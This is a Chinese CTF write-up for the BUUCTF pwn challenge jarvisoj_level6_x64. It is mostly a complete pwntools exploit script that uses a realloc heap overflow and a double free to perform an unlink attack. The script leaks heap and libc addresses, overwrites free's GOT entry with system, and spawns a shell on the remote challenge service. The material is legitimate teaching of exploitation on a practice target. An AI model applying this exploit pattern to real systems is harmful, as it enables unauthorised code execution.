buuctf-pwn:jarvisoj_level6_x64

程序只能申请unsorted bin大小的chunk,这种条件下用unlink来做

IDA看一下,可以发现edit里面有任意堆溢出的情况(realloc造成堆溢出)

然后free里面有UAF漏洞

然后几个注意的点,unlink直接可以模板化

1,泄漏地址 包括libc或者存放heap pointer的地址

2,unlink:伪造哪个chunk,就用指向该chunk的指针(即存放它的地址)来完成unlink

3,把heap指针改成got表地址,也可以泄漏libc

exp

1 #coding:utf-8
2 '''
3 author: lemon
4 time:
5 libc:
6 python version:
7 '''
8
9 from pwn import *
10 from LibcSearcher import *
11
# Target switch: 1 starts the challenge binary as a local process, any other
# value connects to the remote service.
local = 0

binary = "./freenote_x64"

# `p` is the pwntools tube that every menu helper below reads from and writes to.
p = process(binary) if local == 1 else remote("node3.buuoj.cn", 29231)
20
def dbg():
    """Switch pwntools to debug-level logging."""
    context.log_level = 'debug'
23
# Terminal command pwntools uses when it opens a debugger window
# (a horizontal tmux split); only relevant if gdb.attach is enabled.
context.terminal = ['tmux', 'splitw', '-h']
25
def add(size, content):
    """Create a note through menu option 2.

    size    -- sent as the "Length of new note" answer.
    content -- sent as-is after the "Enter your note:" prompt; no newline
               is appended.
    """
    length_line = str(size)
    p.sendlineafter('Your choice:', '2')
    p.sendlineafter('Length of new note: ', length_line)
    p.sendafter('Enter your note:', content)
30
def free(index):
    """Delete the note with the given number through menu option 4."""
    note_number = str(index)
    p.sendlineafter('Your choice: ', '4')
    p.sendlineafter('Note number: ', note_number)
34
def show():
    """Request the note listing through menu option 1.

    Only sends the menu choice; the caller reads the output from `p`.
    """
    p.sendlineafter('Your choice: ', '1')
37
def edit(index, size, content):
    """Rewrite a note through menu option 3.

    index   -- note number to edit.
    size    -- new length sent to the program; the script passes lengths
               larger than the note's original size, which is the overflow
               the write-up attributes to realloc.
    content -- sent as-is after the "Enter your note: " prompt; no newline
               is appended.
    """
    note_number = str(index)
    new_length = str(size)
    p.sendlineafter('Your choice: ', '3')
    p.sendlineafter('Note number: ', note_number)
    p.sendlineafter('Length of note: ', new_length)
    p.sendafter('Enter your note: ', content)
43
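# NOTE(review): Python 2 script (print statements, str payloads). It needs
# pwntools and LibcSearcher and drives the tube `p` opened above.

# Five 0x80-byte notes, numbered 0-4. The hard-coded offsets further down
# depend on this exact allocation order.
add(0x80, 0x80 * 'a')  # chunk 0
add(0x80, 0x80 * 'a')  # chunk 1
add(0x80, 0x80 * 'a')  # chunk 2
add(0x80, 0x80 * 'a')  # chunk 3
add(0x80, 0x80 * 'a')  # chunk 4

# Note 4 is rewritten to hold the string "/bin/sh\x00".
edit(4, len("/bin/sh\x00"), "/bin/sh\x00")

#libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

print "unlink前先泄漏出堆的基地址"

free(3)
free(1)

# edit() accepts 0x90 bytes for a note that was created with 0x80 bytes.
# With no NUL byte left after the padding, show() prints whatever follows it.
payload = 0x90 * 'a'
edit(0, len(payload), payload)
show()
p.recvuntil(0x90 * 'a')
#heap = u64(p.recv(6) + '\x00\x00')
# The leak is read up to the newline and padded with four NUL bytes, so it is
# assumed to be exactly four bytes long (u64 needs eight). 0x19a0 and 0x1a40
# are fixed offsets for this target's heap layout.
# NOTE(review): heap_0 is presumably the address that stores note 0's heap
# pointer, as step 1 of the write-up describes -- confirm in a debugger.
heap_0 = u64(p.recvuntil('\x0a', drop=True) + '\x00\x00\x00\x00') - 0x19a0
print "[*] heap:", hex(heap_0)
heap_4 = heap_0 + 0x1a40


print "unlink"

# fd and bk of the forged chunk are both derived from heap_0.
fd = heap_0 - 0x18
bk = heap_0 - 0x10

# First 0x80 bytes: forged header (0, 0x80), then fd/bk, NUL padded.
# The trailing 0x10 bytes (0x80, 0x90) are written past note 0's 0x80 bytes.
payload = p64(0) + p64(0x80)
payload += p64(fd) + p64(bk)
payload = payload.ljust(0x80, '\x00')
payload += p64(0x80) + p64(0x90)
edit(0, len(payload), payload)

# Note 1 was already freed above; the program accepting a second free of it
# is the stale-pointer flaw the write-up calls the UAF in free.
free(1)

print "leak libc"

# Same file as `binary`; reuse the variable instead of repeating the path.
elf = ELF(binary)
free_got = elf.got['free']
print "[*] free:", hex(free_got)

payload = p64(2) + p64(1) + p64(0x8) + p64(free_got)  # set chunk0 size to 0x8
payload += p64(0) * 9 + p64(1) + p64(8) + p64(heap_4)
payload = payload.ljust(0x90, '\x00')
edit(0, len(payload), payload)
show()
# Stored as free_addr so the free() helper defined earlier is not replaced
# by an integer.
free_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))

# libc_base = free_addr - libc.sym['free']
# system = libc_base + libc.sym['system']

# LibcSearcher selects a libc build from the leaked address of free.
# NOTE(review): the match is a lookup result, not a certainty -- verify the
# selected build against the target (the commented-out path above suggests
# libc-2.23).
libc = LibcSearcher('free', free_addr)
libc_base = free_addr - libc.dump('free')
system = libc_base + libc.dump('system')

# Writes the computed address through note 0 (8 bytes).
# NOTE(review): step 3 of the write-up points the note at a GOT entry, so this
# presumably depends on a writable GOT (binary not built with full RELRO) --
# confirm with checksec.
payload = p64(system)
edit(0, len(payload), payload)

#gdb.attach(p)
p.interactive()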